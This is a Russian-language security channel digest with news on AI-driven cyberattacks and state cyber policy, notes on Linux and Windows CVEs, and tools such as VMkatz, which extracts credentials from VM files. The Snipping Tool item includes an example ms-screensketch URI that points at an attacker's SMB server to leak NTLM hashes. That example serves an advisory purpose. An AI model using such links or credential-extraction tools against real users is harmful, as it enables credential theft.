AP Security

#news Япония готовится к отражению кибератак со стороны ИИ типа Mythos 🔩 Власти Японии обнаружили пробелы в законодательстве, которые препятствуют оперативной работе по отражению и ликвидации последствий возможных кибератак со стороны модели искусственного интеллекта (ИИ) типа Mythos. Министр связи Есимаса Хаяси заявил, что противодействие сложным атакам является «неотложным вопросом», пишет издание The Asahi Shimbun. Правящая Либерально-демократическая партия призвала правительственные учреждения создать более прочные защитные структуры. Усилия по созданию таких систем в настоящее время предпринимаются быстрыми темпами. 20 апреля состоялось экстренное партийное совещание с приглашением представителей разработчика ИИ Anthropic. Как сообщается, компания выразила готовность помочь Японии в решении проблем. Источник: https://www.kommersant.ru/doc/8624552

#pentest #cve Dirty Frag: Universal Linux LPE 🖥 Два бага в ядре Linux (CVE-2026-43284 и CVE-2026-43500), позволяющие локальному пользователю без прав получить root через запись шеллкода в кэш страниц системных бинарных файлов (например, /usr/bin/su или /usr/bin/sudo). Условия эксплуатации: ◽️нужен локальный shell (физический доступ или взломанный пользователь) ◽️любое ядро Linux с 2017 года по апрель 2026 года (до выхода патча) ◽️достаточно любого непривилегированного пользователя Меры защиты: 📌Срочно обновить ядро до версии с патчем (патч уже выпущен дистрибутивами) 📌 При отсутствии возможности обновиться необходимо заблокировать три модуля ядра - esp4,esp6,rxrpc. Важно: пострадает IPsec ( использует модули esp4, esp6) - блокировка нарушит работу VPN-серверов. Блокировка нарушит работу клиентов файловой системы AFS (Andrew File System) ( модуль rxrpc ). 📌Ограничить локальный доступ к системе — чем меньше непривилегированных пользователей, тем лучше.

#рубрика

#news Контртерроризм по-новому: США вписали наступательные хакерские атаки в национальную стратегию 📶 Администрация США включила наступательные кибероперации в новую контртеррористическую стратегию. Документ предусматривает применение цифровых операций против структур и лиц, считающихся Вашингтоном угрозой американским интересам, а также против пособников подготовки атак на американцев. Сам формат подобных операций в стратегии не раскрывается, но прямое упоминание кибератак показывает превращение цифровых инструментов в часть государственной силовой политики. Для союзников США новая стратегия тоже будет иметь значение. При расширении применения наступательных операций в контртеррористической политике другие страны могут копировать модель или ссылаться на неё для обоснования собственных действий. Источник: https://cisoclub.ru/kontrterrorizm-po-novomu-ssha-vpisali-nastupatelnye-hakerskie-ataki-v-nacionalnuju-strategiju/

#cve CVE-2026-33829 📱 CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации. Сам же PoC демонстрирует атаку в локальной сети. ➡️ Проблема кроется в некорректной обработке URI-схемы ms-screensketch. При попытке открыть ссылку вида ms-screensketch:edit?filePath=\\server_злоумышленника\file.png происходит попытка подключения к SMB-серверу, автоматически отправляя хеш пароля. В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты.

#рубрика

От всей души поздравляем Вас с Днем Победы — 9 мая. Этот праздник навсегда останется символом величайшего мужества, несгибаемой воли и подлинной любви к Родине. Мы преклоняемся перед подвигом ветеранов и тружеников тыла, которые ценой неимоверных усилий отстояли мир на земле. Их героизм - это нравственный ориентир для всех нас. Особые слова благодарности тем, кто сейчас, в наши дни, с оружием в руках защищает Родину, продолжает ратные традиции дедов и прадедов, охраняет покой и безопасность нашей страны, отстаивает её интересы и суверенитет. Ваша преданность долгу и мужество вызывают глубочайшее уважение. Желаем всем благополучия, чистого неба над головой и уверенности в завтрашнем дне. Пусть память о Великой Победе всегда наполняет наши сердца гордостью и дает силы для новых свершений.

#soc #tools OSS2Falco 🖥 Falco — это популярный инструмент с открытым исходным кодом для обеспечения безопасности облачных сред и контейнеров, который оповещает о подозрительной активности. OSS2Falco — это набор правил Falco, преобразованных из популярных инструментов и наборов правил с открытым исходным кодом.

#byapsecurity Подавитель сотовой связи БЛ 2020 🛡 Блокиратор сотовой связи и беспроводного доступа «БЛ-2020», предназначен для предотвращения несанкционированной передачи информации по каналам сотовой связи и сетям беспроводного доступа, а также исключения возможности дистанционного управления различного рода устройствами. Отличительные особенности: ✔️изделие имеет модульную конструкцию, которая позволяет «собирать» блокиратор, исходя из конкретных требований заказчика. Базовая поставка может включать один или два модуля изделия; ✔️изделие обеспечивает блокирование самых распространенных на сегодняшний день стандартов сотовой связи 2G,3G,4G и сетей беспроводного доступа Bluetooth, Wi-Fi, в том числе в диапазоне 5850-5950МГц; ✔️выходная мощность на антенном выходе на нагрузке 50 Ом устанавливается в диапазоне 0,5- 2,0 Вт; ✔️внешние штыревые антенны позволяют создавать круговую зону блокирования, а применение направленных антенн обеспечивают локальную зону блокирования; ✔️блокирование осуществляется постоянно в режиме «заградительная помеха». Зона блокирования в этом случае регулируется только мощностью блокирующего сигнала и применением определенных антенн. Подробнее ✍️: https://apsecurity.ru/products/cellular-communication-blocker/bl2020

#tools Cybersecurity AI (CAI) 🖥 Cybersecurity AI (CAI) — это легковесная платформа с открытым исходным кодом, которая позволяет специалистам по безопасности создавать и внедрять автоматизированные решения для наступательных и оборонительных действий в ИБ на основе искусственного интеллекта. Для тех, кто собирается тестировать данное решение, прикладываем статью, в которой автор опробовал инструмент на популярных тренировочных ресурсах и показал результаты работы.

#рубрика

#pentest Атакуем LLM 📥 Коротко и на примерах автор статьи показывает о существующих типах атак на LLM и влиянии их на бизнес. Важная тема для рассуждения в эпоху внедрения новой технологии в бизнес - процессы. Приятного прочтения ⭐️

#event Pentest award 2026 открыл прием заявок!🔥 Каждый год у этичных хакеров появляется возможность заявить о себе, продемонстрировать свои навыки и творческий подход к решению задач в области тестирования на проникновение. Главный приз за победу — статуэтка и макбук! За вторые и третьи места призеры получат айфоны и смарт-часы. Церемония награждения состоится 14 августа на Красном Октябре Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею. ✔️ Отправляйте заявки на сайте, участвуйте и побеждайте!

#news Хакеры захватывают домашние роутеры россиян и используют их для кражи данных и атак 🗣 Хакеры научились перехватывать домашние маршрутизаторы пользователей и получают под своё крыло весь интернет-трафик вместе с доступом к подключённой технике от смартфонов до систем умного дома. Через правку настроек роутера преступники подменяют DNS-записи и уводят хозяина на поддельные сайты ради кражи логинов, паролей и платёжных реквизитов. Об этом рассказали в управлении по борьбе с противоправным использованием информационно-коммуникационных технологий МВД России. Утечка данных составляет лишь верхушку айсберга. Взломанные устройства охотно запрягают в дальнейшие атаки на посторонние цели. Через такие роутеры расползается спам-рассылка, катятся распределённые атаки на серверы компаний и перебираются пароли к чужим учётным записям. Весь этот трафик числится исходящим от рядового пользователя, чьё железо угодило в чужие руки. Хозяину сети подобный расклад сулит отдельную порцию неприятностей. Вся преступная суета уходит наружу с его IP-адреса, и в разбирательствах с правоохранителями крайним рискует оказаться именно он. Реальный контроль над устройством к этому моменту давно ушёл на сторону, а отмываться от обвинений приходится задним числом. Источник: https://cisoclub.ru/hakery-zahvatyvajut-domashnie-routery-rossijan-i-ispolzujut-ih-dlja-krazhi-dannyh-i-atak/

#redteam #tools VMkatz✏️ Утилита VMkatz предназначена для извлечения секретов (NTLM-хеши, ключи DPAPI, билеты Kerberos, LSA-секреты, NTDS.dit, ключи BitLocker) напрямую из файлов виртуальных машин (VMDK, VMSN, SAV), работая с ними на NAS или гипервизоре без необходимости выгрузки образов дисков. 📌 Может быть полезна при Red Team операциях, а также Purple Team мероприятиях.

#news Минцифры готовит штрафы за срыв перехода на доверенные ПАК на объектах КИИ⚠️ Минцифры готовит новые штрафы для тех, кто затянет переход на доверенные программно-аппаратные комплексы на объектах критической информационной инфраструктуры. Речь идёт о поправках в КоАП, которые ведомство разрабатывает по поручению вице-премьера Дмитрия Григоренко. Санкции хотят распространить на госорганы, госкомпании и организации с госучастием, если они не уложатся в установленные сроки перехода. Сама логика у государства здесь довольно жёсткая: значимые объекты КИИ должны поэтапно уходить от иностранных решений и переходить на доверенные отечественные ПАК. Этот курс был закреплён ещё раньше, а финальной точкой сейчас считается 1 января 2030 года — именно к этой дате на таких объектах должен быть завершён переход. По оценкам экспертов, переход на новые ПАК у части заказчиков идёт тяжело, а общий уровень импортозамещения на таких объектах всё ещё далёк от стопроцентного. На этом фоне желание государства подстегнуть процесс рублём выглядит вполне ожидаемо. Тем более что, по данным Минцифры, к марту 2025 года более двух третей значимых объектов КИИ госорганов и госкомпаний уже перешли на отечественное ПО. Источник: https://www.anti-malware.ru/news/2026-04-20-111332/49764

#forensics #tools Hayabusa 📌 Hayabusa - полезная утилита на Rust, которая применяется на этапе триажа инцидентов информационной безопасности для быстрой идентификации аномалий (например, брутфорс, создание служб, изменение политик, запуск процессов из временных директорий) и снижения количества ложноположительных срабатываний.